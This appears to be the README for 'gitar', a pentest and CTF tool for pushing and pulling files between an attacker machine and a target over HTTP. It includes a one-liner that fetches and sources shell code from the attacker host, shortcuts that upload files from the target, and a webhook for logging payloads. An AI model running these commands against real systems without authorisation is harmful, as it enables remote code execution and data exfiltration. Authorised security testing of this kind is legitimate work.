📡 A more sophisticated python HTTP server sibling
🎸 focusing on having the simplest interactions for file exchange (Pentest/CTF)
🎵 with additional functionalities: quick file sending and HTTP webhook logging
 |
|---|
| ~> Have the simplest possible shortcuts to upload/download file to/from the target machine ~> No installation needed on target machine ~> Fast and simple deployment |
On my target machine:
- Download a file from my attacker machine:
pull [file](with filename completion) - Download a directory from my attacker machine:
pullr [directory](with filename completion) - Upload a file to my attacker machine:
push [file] - Upload a directory to my attacker machine:
pushr [directory]
Before be able to use these shortcut you have to set up both machines. Once again, the aim is to made it as simple as possible
On Attacker machine:
gitarOn Target machine:
# Get shortcuts and source them. The one-liner corresponding is by default copy on clipboard.
# It is also provided by step 1. (in gitar output):
source <(curl -s http://[attacker_ip:port]/alias)And that's all, you can now push or pull file 🎶
This is basicaly the same as launching gitar server. But as we expose our http server we become the prey. Hence we must harden a bit the server. To do this we launch gitar inside a container and use HTTPS.
The following steps expose files of current directory. Files uploaded by remote are written inside current directory also.
On Attacker machine:
docker run -it --rm --net host --cap-drop=all --cap-add=dac_override --user $(id -u):$(id -g) -v "${PWD}:/gitar/exchange" ariary/gitarYou can now pushor pull file being more safe 🎶
- HTTP Network connectivity between attacker & target machines
- On target machine:
curltarfor directory upload
- On attacker machine:
xclipto copy command on clipboard (not required)tree: to expose it trough server (not required)dig: to automatically find extarnal IP (not required)
The aim is to keep "target requirements" as fit as possible. Attacker machine requirements are not a big deal as we have plenty control over it and time to configure it.
Use this mode to quickly send a file to a target machine using different method/protocol. The advantage is that you do not have to remember the command line (if required field is not specified with flags it will be asked in a prompt).
It also has a kind of memory. with the -l flag it will use the previous configuration to send the file.
# send /img folder using scp with user root to target.com
gitar send scp -t target.com -u root /img
# now send exploit.sh to the same hsot
gitar send -l exploit.shUse this mode if you want to have some logs about incoming HTTP requests. It enables us to:
- Log request information
- request parameter values
- request header values
- request body
- Override response
- header
- Forward request to another http server (~ local logging middleware)
- Serve directory
# log incoming request and retrieve payload parameter value
gitar webhook -P payloadgo install github.com/ariary/gitar@latest